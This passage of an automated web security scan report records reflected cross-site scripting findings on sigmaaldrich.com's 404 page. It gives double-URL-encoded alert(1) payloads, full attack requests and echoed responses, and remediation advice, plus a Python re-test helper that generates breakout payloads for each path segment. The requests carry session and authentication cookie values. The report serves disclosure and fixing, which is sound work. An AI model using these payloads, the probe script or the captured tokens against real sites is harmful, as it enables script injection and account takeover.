fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:30 GMT
Content-Length: 28985
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contentcf095";alert(1)//236ed0f1918/sigma-aldrich/technical-service/technical-service-home/enews-subscription","E404") ;
   </script>
...[SNIP]...

1.219. http://www.sigmaaldrich.com/content/sigma-aldrich/technical-service/technical-service-home/enews-subscription [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/technical-service/technical-service-home/enews-subscription

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 498c8%2522%253balert%25281%2529%252f%252f79494c4480b was submitted in the REST URL parameter 2. This input was echoed as 498c8";alert(1)//79494c4480b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character. The response confirms that the value is percent-decoded twice: the submitted %2522 arrives in the script as a literal double quote, which closes the string literal. As echoed, the statement reads cmCreateErrorTag("Error 404 | ...";alert(1)//... with the call's argument list left open, so this exact proof-of-concept is a JavaScript syntax error rather than an executed alert; the string context is broken all the same, and closing the call before the injected statement (a payload beginning ");) uses only characters the double-encoding is already shown to carry.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. Here the sink is the site's 404 template, which splices the requested URL into the first argument of cmCreateErrorTag() inside a double-quoted JavaScript string, so any path that produces a 404 reaches it. If at all possible, the application should avoid echoing user data within this context; where the URL must be passed to the error tag, it should be encoded for a JavaScript string literal at the point of output (every character outside [A-Za-z0-9] as a \xHH or \uHHHH escape), so that a quote can neither terminate the literal nor a </script> sequence end the block. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will already have carried out one decode; removing that second decode is what closes the double-encoding bypass. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and a path that would still change under a further decode should be rejected rather than decoded again.

Request

GET /content/sigma-aldrich498c8%2522%253balert%25281%2529%252f%252f79494c4480b/technical-service/technical-service-home/enews-subscription HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:32 GMT
Content-Length: 28985
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich498c8";alert(1)//79494c4480b/technical-service/technical-service-home/enews-subscription","E404") ;
   </script>
...[SNIP]...

1.220. http://www.sigmaaldrich.com/content/sigma-aldrich/technical-service/technical-service-home/enews-subscription [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/technical-service/technical-service-home/enews-subscription

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac96a%2522%253balert%25281%2529%252f%252f5c2cde5b8b5 was submitted in the REST URL parameter 3. This input was echoed as ac96a";alert(1)//5c2cde5b8b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character. The response confirms that the value is percent-decoded twice: the submitted %2522 arrives in the script as a literal double quote, which closes the string literal. As echoed, the statement reads cmCreateErrorTag("Error 404 | ...";alert(1)//... with the call's argument list left open, so this exact proof-of-concept is a JavaScript syntax error rather than an executed alert; the string context is broken all the same, and closing the call before the injected statement (a payload beginning ");) uses only characters the double-encoding is already shown to carry.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. Here the sink is the site's 404 template, which splices the requested URL into the first argument of cmCreateErrorTag() inside a double-quoted JavaScript string, so any path that produces a 404 reaches it. If at all possible, the application should avoid echoing user data within this context; where the URL must be passed to the error tag, it should be encoded for a JavaScript string literal at the point of output (every character outside [A-Za-z0-9] as a \xHH or \uHHHH escape), so that a quote can neither terminate the literal nor a </script> sequence end the block. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3, as the web server will already have carried out one decode; removing that second decode is what closes the double-encoding bypass. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and a path that would still change under a further decode should be rejected rather than decoded again.

Request

GET /content/sigma-aldrich/technical-serviceac96a%2522%253balert%25281%2529%252f%252f5c2cde5b8b5/technical-service-home/enews-subscription HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:34 GMT
Content-Length: 28985
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/technical-serviceac96a";alert(1)//5c2cde5b8b5/technical-service-home/enews-subscription","E404") ;
   </script>
...[SNIP]...

1.221. http://www.sigmaaldrich.com/content/sigma-aldrich/technical-service/technical-service-home/enews-subscription [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/technical-service/technical-service-home/enews-subscription

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5959%2522%253balert%25281%2529%252f%252fd68bc01eb63 was submitted in the REST URL parameter 4. This input was echoed as e5959";alert(1)//d68bc01eb63 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character. The response confirms that the value is percent-decoded twice: the submitted %2522 arrives in the script as a literal double quote, which closes the string literal. As echoed, the statement reads cmCreateErrorTag("Error 404 | ...";alert(1)//... with the call's argument list left open, so this exact proof-of-concept is a JavaScript syntax error rather than an executed alert; the string context is broken all the same, and closing the call before the injected statement (a payload beginning ");) uses only characters the double-encoding is already shown to carry.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. Here the sink is the site's 404 template, which splices the requested URL into the first argument of cmCreateErrorTag() inside a double-quoted JavaScript string, so any path that produces a 404 reaches it. If at all possible, the application should avoid echoing user data within this context; where the URL must be passed to the error tag, it should be encoded for a JavaScript string literal at the point of output (every character outside [A-Za-z0-9] as a \xHH or \uHHHH escape), so that a quote can neither terminate the literal nor a </script> sequence end the block. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4, as the web server will already have carried out one decode; removing that second decode is what closes the double-encoding bypass. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and a path that would still change under a further decode should be rejected rather than decoded again.

Request

GET /content/sigma-aldrich/technical-service/technical-service-homee5959%2522%253balert%25281%2529%252f%252fd68bc01eb63/enews-subscription HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:36 GMT
Content-Length: 28985
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/technical-service/technical-service-homee5959";alert(1)//d68bc01eb63/enews-subscription","E404") ;
   </script>
...[SNIP]...

1.222. http://www.sigmaaldrich.com/content/sigma-aldrich/technical-service/technical-service-home/enews-subscription [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/technical-service/technical-service-home/enews-subscription

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8fa8%2522%253balert%25281%2529%252f%252f22e7bdf4d51 was submitted in the REST URL parameter 5. This input was echoed as c8fa8";alert(1)//22e7bdf4d51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character. The response confirms that the value is percent-decoded twice: the submitted %2522 arrives in the script as a literal double quote, which closes the string literal. As echoed, the statement reads cmCreateErrorTag("Error 404 | ...";alert(1)//... with the call's argument list left open, so this exact proof-of-concept is a JavaScript syntax error rather than an executed alert; the string context is broken all the same, and closing the call before the injected statement (a payload beginning ");) uses only characters the double-encoding is already shown to carry.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. Here the sink is the site's 404 template, which splices the requested URL into the first argument of cmCreateErrorTag() inside a double-quoted JavaScript string, so any path that produces a 404 reaches it. If at all possible, the application should avoid echoing user data within this context; where the URL must be passed to the error tag, it should be encoded for a JavaScript string literal at the point of output (every character outside [A-Za-z0-9] as a \xHH or \uHHHH escape), so that a quote can neither terminate the literal nor a </script> sequence end the block. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5, as the web server will already have carried out one decode; removing that second decode is what closes the double-encoding bypass. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and a path that would still change under a further decode should be rejected rather than decoded again.
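Issues 1.218 to 1.222 reach the same 404 template through each of the five segments of one path. The re-test helper below is an added example, not part of the report or of any scanner: it builds the double-encoded marker in the report's own form, appends it to the Nth path segment the way the "REST URL parameter N" cases are formed, and checks the final response body for the marker sitting unencoded inside a <script> block. The caller's fetch function must follow the redirect noted above and return the final body; the canned 404 template and the two fake fetch functions are constructed stand-ins for a real HTTP client, and the marker mirrors the report's so that results line up with it (nothing is executed, only the reflection is classified).

```python
import re
from urllib.parse import unquote

# Constructed stand-in for the 404 page excerpted in the report. Assumption: the same
# template serves every 404 on the host, which is what the five findings above show.
CANNED_404_TEMPLATE = (
    '<html><head>\n<script language="JavaScript1.1">\n'
    '       cmCreateErrorTag("Error 404 | {{URL}}","E404") ;\n'
    '   </script>\n</head><body>Not Found</body></html>'
)
SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
BREAKOUT = '";alert(1)//'   # the report's marker: closes the literal, then comments out the rest


def pct(value: str) -> str:
    """Lower-case percent-encoding of every byte outside [A-Za-z0-9]."""
    return "".join(chr(b) if b < 128 and chr(b).isalnum() else f"%{b:02x}"
                   for b in value.encode("utf-8"))


def double_encode(value: str) -> str:
    """Encode twice: the web server's decode yields %HH, the application's yields the char."""
    return pct(pct(value))


def probe_path(base_path: str, param_index: int, payload: str) -> str:
    """Append payload to the 1-based Nth path segment ('REST URL parameter N')."""
    segs = base_path.strip("/").split("/")
    if not 1 <= param_index <= len(segs):
        raise ValueError(f"{base_path!r} has {len(segs)} segments, no parameter {param_index}")
    segs[param_index - 1] += payload
    return "/" + "/".join(segs)


def confirm_reflection(body: str, prefix: str, suffix: str) -> dict:
    """Classify how the marker came back: absent, reflected but still encoded, or as a
    live string-literal break inside a <script> block (the report's 'Certain' verdict)."""
    needle = prefix + BREAKOUT + suffix
    return {
        "reflected": prefix in body and suffix in body,
        "unencoded": needle in body,
        "in_script": any(needle in blk for blk in SCRIPT_BLOCK.findall(body)),
    }


def retest(base_path: str, fetch, prefix: str, suffix: str) -> list:
    """Probe every segment of base_path; fetch(path) must return the final body after
    following redirects (e.g. a requests.get(..., allow_redirects=True) wrapper)."""
    payload = prefix + double_encode(BREAKOUT) + suffix
    results = []
    for n in range(1, len(base_path.strip("/").split("/")) + 1):
        path = probe_path(base_path, n, payload)
        verdict = confirm_reflection(fetch(path), prefix, suffix)
        results.append({"parameter": n, "path": path, **verdict})
    return results


def fake_vulnerable_fetch(path: str) -> str:
    """Mimics the observed server: one decode by the web server, a second by the
    template, raw splice into the script."""
    url = "http://www.sigmaaldrich.com:4402" + unquote(unquote(path))
    return CANNED_404_TEMPLATE.replace("{{URL}}", url)


def fake_no_second_decode_fetch(path: str) -> str:
    """Same template after removing the second decode: %22 stays %22 in the script."""
    url = "http://www.sigmaaldrich.com:4402" + unquote(path)
    return CANNED_404_TEMPLATE.replace("{{URL}}", url)


if __name__ == "__main__":
    base = "/content/sigma-aldrich/technical-service/technical-service-home/enews-subscription"
    for r in retest(base, fake_vulnerable_fetch, "ac96a", "5c2cde5b8b5"):
        print(r["parameter"], "in_script" if r["in_script"] else "not in script", r["path"])
```

Against the vulnerable stand-in every segment reports in_script; against the stand-in without the second decode the marker is still reflected, but encoded, which is the distinction a re-test after the fix has to make. Swap the fake fetch for a real client to run it against a host you are authorised to test.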

Request

GET /content/sigma-aldrich/technical-service/technical-service-home/enews-subscriptionc8fa8%2522%253balert%25281%2529%252f%252f22e7bdf4d51 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
